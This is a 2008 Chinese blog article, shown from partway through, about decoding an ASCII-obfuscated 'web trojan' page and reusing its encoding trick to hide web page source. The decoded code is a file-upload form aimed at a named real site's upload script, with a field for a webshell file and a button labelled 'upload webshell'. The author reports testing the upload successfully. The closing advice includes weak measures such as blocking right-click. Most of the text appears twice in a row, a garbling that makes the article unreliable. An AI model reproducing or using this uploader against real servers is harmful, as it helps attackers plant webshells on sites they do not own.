对某ASC加密网马的破解和利用(图)
90人参与 • 2008-10-08 • 加密解密
<body>
<form action=http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<p align="center"><span class="style4"> 源(</span><span class="style3">图片</span><span class="style4">)文件:
</span>
<input name="filename" type="file" class="buttonunactive" size="20">
<span class="style4">
目标(</span><span class="style3">大马</span><span class="style4">)文件:
</span>
<input name="filename1" type=file class=buttonunactive size=20></p>
<p align="center">
<input name=submit type=submit class="button" style=border"1px value=上传大马 double rgb(88.88.88);font:9pt>
<input name=imgwidth type=hidden id=imgwidth>
<input name=imgheight type=hidden id=imgheight>
<input name=aligntype type=hidden id="channelid" value="0">
<input name="channelid" type="hidden" id="channelurlid" value=0>
<input name="id" type="hidden" id="id2">
</p>
4、解密效果
拷贝解密后的html代码保存为一test.htm文件,在浏览器中打开,进行上传测试成功,说明对该网马的asc解密成功。(图3)
5、加密利用
在破解了该网马的asc加密之后,我们利用该网马的加密原理对我们的网页进行加密,达到保护网页代码的效果。asc加密主要用来保护静态页面代码,动态代码由于在服务器端,客户端显示的只是运行结果。“it专家网”的页面是动态生成的,作为演示就以它为例进行。
查看并拷贝网页代码,通过“asccii速查器”把字符转换成asc值。然后把生成的asc值拷贝到我们破解的网马代码中作为t的值。这样可以别人就不能看到网页源代码,看到的只是其的asc值,对网页代码起到了一定的保护作用,运行效果和加密前完全一样。(图4)
总结:asc加密是当前静态网页加密的主要形式,从上面笔者对某网马的解密看,这种加密形式并不能从根本上保证网页代码的安全。基于笔者及其朋友网站维护的经验,推荐几种网页加密方法:
1、脚本加密,通过类似vb、java这样脚本代码实现:封锁鼠标右键、禁止查看源文件、链接调用地址加密等功能。
2、iis的密码,通过对iis的安全、验证等部署,防止非授权的访问。
3、asp程序加密,使用asp程序来给网页进行加密,现在大多数网站都使用asp程序,它对web服务器没有具体要求,而其加密就是借助数据库及asp程序进行设计,来实现一种通用网页加密。
4、软件加密,现在给网页加密的软件非常多,其基本原理都是利用javascript代码,只不过是这些软件都自动准备好了这些代码,只需使用者将网页源代码粘进去点击“加密”按钮就可以了。
<form action=http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<p align="center"><span class="style4"> 源(</span><span class="style3">图片</span><span class="style4">)文件:
</span>
<input name="filename" type="file" class="buttonunactive" size="20">
<span class="style4">
目标(</span><span class="style3">大马</span><span class="style4">)文件:
</span>
<input name="filename1" type=file class=buttonunactive size=20></p>
<p align="center">
<input name=submit type=submit class="button" style=border"1px value=上传大马 double rgb(88.88.88);font:9pt>
<input name=imgwidth type=hidden id=imgwidth>
<input name=imgheight type=hidden id=imgheight>
<input name=aligntype type=hidden id="channelid" value="0">
<input name="channelid" type="hidden" id="channelurlid" value=0>
<input name="id" type="hidden" id="id2">
</p>
4、解密效果
拷贝解密后的html代码保存为一test.htm文件,在浏览器中打开,进行上传测试成功,说明对该网马的asc解密成功。(图3)
5、加密利用
在破解了该网马的asc加密之后,我们利用该网马的加密原理对我们的网页进行加密,达到保护网页代码的效果。asc加密主要用来保护静态页面代码,动态代码由于在服务器端,客户端显示的只是运行结果。“it专家网”的页面是动态生成的,作为演示就以它为例进行。
查看并拷贝网页代码,通过“asccii速查器”把字符转换成asc值。然后把生成的asc值拷贝到我们破解的网马代码中作为t的值。这样可以别人就不能看到网页源代码,看到的只是其的asc值,对网页代码起到了一定的保护作用,运行效果和加密前完全一样。(图4)
总结:asc加密是当前静态网页加密的主要形式,从上面笔者对某网马的解密看,这种加密形式并不能从根本上保证网页代码的安全。基于笔者及其朋友网站维护的经验,推荐几种网页加密方法:
1、脚本加密,通过类似vb、java这样脚本代码实现:封锁鼠标右键、禁止查看源文件、链接调用地址加密等功能。
2、iis的密码,通过对iis的安全、验证等部署,防止非授权的访问。
3、asp程序加密,使用asp程序来给网页进行加密,现在大多数网站都使用asp程序,它对web服务器没有具体要求,而其加密就是借助数据库及asp程序进行设计,来实现一种通用网页加密。
4、软件加密,现在给网页加密的软件非常多,其基本原理都是利用javascript代码,只不过是这些软件都自动准备好了这些代码,只需使用者将网页源代码粘进去点击“加密”按钮就可以了。
赞 (0)
打赏
微信扫一扫
微信扫一扫
您想发表意见!!点此发布评论
发表评论